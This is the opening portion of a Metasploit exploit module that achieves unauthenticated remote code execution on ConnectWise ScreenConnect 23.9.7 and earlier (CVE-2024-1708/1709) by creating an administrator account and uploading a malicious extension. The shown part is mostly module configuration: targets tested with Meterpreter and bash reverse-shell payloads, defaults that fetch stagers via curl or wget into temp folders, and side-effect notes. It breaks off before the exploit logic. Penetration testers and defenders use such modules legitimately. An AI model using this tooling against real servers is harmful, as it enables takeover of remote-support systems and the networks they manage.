ConnectWise ScreenConnect 23.9.7 Unauthenticated Remote Code Execution

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF RCE Exploit 'WatchTowr', # Auth Bypass PoC ], 'References' => [ ['CVE', '2024-1708'], # Path traversal when extracting zip file. ['CVE', '2024-1709'], # Auth bypass to create admin account. ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs ], 'DisclosureDate' => '2024-02-19', 'Platform' => %w[win linux unix], 'Arch' => [ARCH_X64, ARCH_CMD], 'Privileged' => true, # 'NT AUTHORITYSYSTEM' on Windows, root on Linux. 
'Targets' => [ [ # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads: # windows/x64/meterpreter/reverse_tcp 'Windows In-Memory', { 'Platform' => 'win', 'Arch' => ARCH_X64 } ], [ # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads: # cmd/windows/http/x64/meterpreter/reverse_tcp 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL', 'FETCH_WRITABLE_DIR' => '%TEMP%' } } ], [ # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads: # cmd/linux/http/x64/meterpreter/reverse_tcp # cmd/unix/reverse_bash 'Linux Command', { 'Platform' => %w[linux unix], 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'FETCH_COMMAND' => 'WGET', 'FETCH_WRITABLE_DIR' => '/tmp' } } ] ], 'DefaultOptions' => { 'RPORT' => 8040, 'SSL' => false, 'EXITFUNC' => 'thread' }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, # The existing administrator ..
